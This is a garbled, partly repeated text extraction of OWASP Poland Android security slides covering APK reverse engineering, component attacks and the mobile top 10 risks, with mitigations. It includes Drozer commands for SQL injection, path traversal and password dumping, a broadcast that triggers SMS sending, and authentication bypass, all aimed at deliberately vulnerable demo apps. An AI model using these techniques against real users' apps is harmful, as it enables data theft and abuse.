bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
